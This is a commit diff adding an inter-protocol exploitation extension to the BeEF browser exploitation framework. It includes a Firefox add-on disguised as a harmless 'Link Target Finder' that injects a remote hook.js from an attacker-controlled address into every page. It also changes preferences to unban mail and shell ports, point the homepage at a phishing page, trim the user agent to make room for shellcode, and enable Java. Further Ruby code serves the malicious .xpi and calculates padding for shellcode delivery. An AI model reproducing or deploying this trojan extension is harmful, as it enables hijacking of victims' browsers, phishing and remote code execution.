Added first implementation of the IPEC extension, including the malicious FirefoxExtension.

extensions/ipec/config.yaml

@@ -0,0 +1,21 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        ipec:
+            enable: true 
+            name: 'Inter-Protocol Exploitation'
+            authors: ["antisnatchor"]

extensions/ipec/extension.rb

@@ -0,0 +1,60 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+
+  #todo remove it from here:
+  # Handlers
+  #require 'extensions/ipec/fingerprinter'
+  #require 'extensions/ipec/launcher'
+  require 'extensions/ipec/junk_calculator'
+
+  module Ipec
+    extend BeEF::API::Extension
+
+    @short_name = 'Ipec'
+    @full_name = 'Inter-Protocol Exploitation'
+    @description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
+
+    module RegisterIpecRestHandler
+      def self.mount_handler(server)
+        server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
+      end
+    end
+
+    BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
+
+    #todo remove it from here, and make it dynamic.
+    BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator("imapeudora1")
+  end
+end
+end
+
+# Models
+# todo: to be used when we'll have more IPEC exploits
+#require 'extensions/ipec/models/ipec_exploits'
+#require 'extensions/ipec/models/ipec_exploits_run'
+
+# RESTful api endpoints
+require 'extensions/ipec/rest/ipec'
+
+
+
+
+
+
+
+

extensions/ipec/files/LinkTargetFinder/chrome.manifest

@@ -0,0 +1,8 @@
+content     linktargetfinder    chrome/content/
+content     linktargetfinder    chrome/content/ contentaccessible=yes
+overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
+
+locale	linktargetfinder	en-US	locale/en-US/
+
+skin	linktargetfinder	classic/1.0	skin/
+style	chrome://global/content/customizeToolbar.xul	chrome://linktargetfinder/skin/skin.css

extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul

@@ -0,0 +1,22 @@
+<?xml version="1.0"?>
+<?xml-stylesheet href="chrome://linktargetfinder/skin/skin.css" type="text/css"?> 
+<!DOCTYPE linktargetfinder SYSTEM "chrome://linktargetfinder/locale/translations.dtd">
+<overlay id="sample" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+		<script src="linkTargetFinder.js" />
+		
+		<menupopup id="menu_ToolsPopup"> 
+			<menuitem label="&runlinktargetfinder;" key="link-target-finder-run-key" oncommand="linkTargetFinder.run()"/> 
+		</menupopup>
+		
+		<keyset>
+			<key id="link-target-finder-run-key" modifiers="accel alt shift" key="L" oncommand="linkTargetFinder.run()"/>
+		</keyset>
+		
+		<statusbar id="status-bar">
+			<statusbarpanel id="link-target-finder-status-bar-icon" class="statusbarpanel-iconic" src="chrome://linktargetfinder/skin/status-bar.png" tooltiptext="&runlinktargetfinder;" onclick="linkTargetFinder.run()" />
+		</statusbar>
+		
+		<toolbarpalette id="BrowserToolbarPalette">
+			<toolbarbutton id="link-target-finder-toolbar-button" label="Link Target Finder" tooltiptext="&runlinktargetfinder;" oncommand="linkTargetFinder.run()"/>
+		</toolbarpalette>
+</overlay>

extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js

@@ -0,0 +1,37 @@
+var linkTargetFinder = function () {
+	var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
+	return {
+		init : function () {
+			gBrowser.addEventListener("load", function () {
+				//todo change the Extension name
+				var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
+				if (autoRun) {
+					linkTargetFinder.run();
+				}
+			}, false);
+		},
+			
+		run : function () {
+			var head = content.document.getElementsByTagName("head")[0];
+			
+			// add the BeEF hook -- start
+			var s = content.document.createElement('script');
+			s.type='text/javascript';
+			s.src='http://192.168.0.2:3000/hook.js';
+			head.appendChild(s);
+			
+			//setTimeout cannot be used (looks like is ignored).
+			// beef_init if called manually from the console, works perfectly.
+			
+			// adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
+			// John Wilander suggestions. we might leave it there anyway.
+			//alert(1);
+			//setTimeout(function(){beef_init()}, 5000);
+			//alert(3);
+			
+			// add the BeEF hook -- end
+			
+		}
+	};
+}();
+window.addEventListener("load", linkTargetFinder.init, false);

extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul

@@ -0,0 +1,31 @@
+<?xml version="1.0"?>
+<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
+ 
+<prefwindow 
+     title="Link Target Finder Preferences"
+     xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+ 
+	<prefpane label="Link Target Finder Preferences">
+		<preferences>
+			<preference id="link-target-finder-autorun" name="extensions.linktargetfinder.autorun" type="bool"/>
+		</preferences>
+		
+		<groupbox>
+			<caption label="Settings"/>
+			<grid>
+				<columns>
+					<column flex="4"/>
+					<column flex="1"/>
+				</columns>
+				<rows>
+					<row>
+						<label control="autorun" value="Autorun"/>
+						<checkbox id="autorun" preference="link-target-finder-autorun"/>
+					</row>
+				</rows>
+			</grid>
+		</groupbox>	
+		
+	</prefpane>
+ 
+</prefwindow>

extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js

@@ -0,0 +1,21 @@
+// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
+// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
+pref("extensions.linktargetfinder.autorun", false);
+
+// PortBanning override
+pref("network.security.ports.banned.override", "20,21,22,25,110,143");
+
+// home page is a phishing page create with BeEF Social Engineering extension,
+// the BeEF hook is added.
+pref("browser.startup.homepage.override", "http://www.binc.com");
+pref("browser.newtab.url", "http://www.binc.com");
+pref("browser.startup.page.override", "1");
+
+//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
+// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
+// new: Firefox/15.0.1
+pref("general.useragent.override", "Firefox/15.0.1");
+
+// enable Java
+pref("security.enable_java", true);
+

extensions/ipec/files/LinkTargetFinder/install.rdf

@@ -0,0 +1,23 @@
+<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+
+	<Description about="urn:mozilla:install-manifest">
+		<em:id>linktargetfinder@robertnyman.com</em:id>
+		<em:name>Link Target Finder</em:name>
+		<em:version>1.0</em:version>
+		<em:type>2</em:type>
+		<em:creator>Robert Nyman</em:creator>
+		<em:description>Finds links that have a target attribute</em:description>
+		<em:homepageURL>http://www.robertnyman.com/</em:homepageURL>
+		<em:optionsURL>chrome://linktargetfinder/content/options.xul</em:optionsURL>
+
+		<em:targetApplication>
+			<Description>
+				<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+				<em:minVersion>2.0</em:minVersion>
+				<em:maxVersion>23.0</em:maxVersion>
+			</Description>
+		</em:targetApplication>
+	</Description>      
+</RDF>

extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd

@@ -0,0 +1 @@
+<!ENTITY runlinktargetfinder "Run Link Target Finder">

extensions/ipec/files/LinkTargetFinder/skin/skin.css

@@ -0,0 +1,12 @@
+#link-target-finder-toolbar-button {
+	list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
+}
+
+#link-target-finder-status-bar-icon {
+	width: 83px;
+	margin: 0 5px;
+}
+
+.link-target-finder-selected {
+	outline: 2px solid red !important;
+}

extensions/ipec/junk_calculator.rb

@@ -0,0 +1,40 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module Ipec
+      class JunkCalculator
+        include Singleton
+
+        def initialize
+           @binded_sockets = {}
+           @host = BeEF::Core::Configuration.instance.get('beef.http.host')
+        end
+
+        def bind_junk_calculator(name)
+          port = 2000
+          #todo add binded ports to @binded_sockets. Increase +1 port number if already binded
+          #if @binded_sockets[port] != nil
+          #else
+          #end
+          BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
+          @binded_sockets[name] = port
+
+        end
+      end
+    end
+  end
+end

extensions/ipec/models/ipec_exploits.rb

@@ -0,0 +1,37 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class IpecExploits
+
+        include DataMapper::Resource
+        #todo: use this table when we'll have a bigger IPEC exploits choice
+        storage_names[:default] = 'extension_ipec_exploits'
+
+        property :id, Serial
+
+        property :name, Text, :lazy => false
+        property :protocol, String, :lazy => false
+        property :os, String, :lazy => false
+
+        has n, :extension_ipec_exploits_run, 'IpecExploitsRun'
+
+      end
+
+    end
+  end
+end

extensions/ipec/models/ipec_exploits_run.rb

@@ -0,0 +1,36 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class IpecExploitsRun
+
+        include DataMapper::Resource
+        #todo: use this table when we'll have a bigger IPEC exploits choice
+        storage_names[:default] = 'extension_ipec_exploits_run'
+
+        property :id, Serial
+        property :launched, Boolean, :lazy => false
+        property :http_headers, Text, :lazy => false
+        property :junk_size, String, :length => 3, :lazy => false
+
+        belongs_to :ipec_exploits
+
+      end
+
+    end
+  end
+end

extensions/ipec/rest/ipec.rb

@@ -0,0 +1,88 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Extension
+    module Ipec
+      class IpecRest < BeEF::Core::Router::Router
+
+        before do
+          # NOTE: the method exposed by this class are NOT-AUTHENTICATED.
+          # They need to be called remotely from a hooked browser.
+
+          #error 401 unless params[:token] == config.get('beef.api_token')
+          #halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # Determine the exact size of the cross-domain request HTTP headers.
+        # Needed to calculate junk properly and prevent errors.
+        # See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
+        # todo: the core of this method should be moved to ../junk_calculator.rb
+        get '/junk/:name' do
+           socket_name = params[:name]
+           halt 401 if not BeEF::Filters.alphanums_only?(socket_name)
+           socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
+           halt 404 if socket_data == nil
+
+           if socket_data.include?("\r\n\r\n")
+              result = Hash.new
+
+              headers = socket_data.split("\r\n\r\n").first
+              BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
+              print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
+              # CRLF -> 4 bytes
+              result['size'] = headers.size + 4
+
+              headers.split("\r\n").each do |line|
+                if line.include?("Host")
+                  result['host'] = line.size + 2
+                end
+                if line.include?("Content-Type")
+                  result['contenttype'] = line.size + 2
+                end
+                if line.include?("Referer")
+                  result['referer'] = line.size + 2
+                end
+              end
+              result.to_json
+           else
+             print_error "[IPEC] Looks like there is no CRLF in the data received!"
+             halt 404
+           end
+        end
+
+
+        # The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
+        # If you want to modify the pref.js file, do the following to re-pack the extension:
+        # $cd firefox_extension_directory
+        # $zip -r ../result-name.xpi *
+        get '/ff_extension' do
+          response['Content-Type'] = "application/x-xpinstall"
+          ff_extension = "#{File.expand_path('../../../ipec/files', __FILE__)}/LinkTargetFinder.xpi"
+          print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
+          send_file "#{ff_extension}",
+                    :type => 'application/x-xpinstall',
+                    :disposition => 'inline'
+        end
+
+      end
+    end
+  end
+end